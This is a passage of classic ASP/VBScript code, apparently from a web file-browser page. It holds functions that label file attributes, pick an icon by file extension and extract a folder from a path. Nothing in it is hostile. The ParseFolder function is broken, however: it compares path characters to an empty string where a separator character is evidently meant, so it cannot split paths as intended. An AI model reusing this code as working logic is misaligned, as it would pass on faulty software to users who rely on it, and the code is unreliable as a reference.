Dim lvAttributes
Dim lsResult
lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
If lvAttributes(0) = 1 Then lsResult = "ReadOnly "
If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden "
If lvAttributes(2) = 1 Then lsResult = lsResult & "System "
If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive "
Attributes = lsResult
End Function
Private Function FileExtension(FileName)
Dim lsExt
Dim liCount
For liCount = Len(FileName) To 1 Step -1
If Mid(FileName, liCount, 1) = "." Then
lsExt = Right(FileName, Len(FileName) - liCount)
Exit For
End If
Next
If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
lsExt = ""
End If
FileExtension = lsExt
End Function
Private Function ParseFolder(PathString)
Dim liCount
If Right(PathString, 1) = "" Then
ParseFolder = PathString
Else
For liCount = Len(PathString) To 1 Step -1
If Mid(PathString, liCount, 1) = "" Then
ParseFolder = Left(PathString, liCount)
Exit For
End If
Next
End If
End Function
%>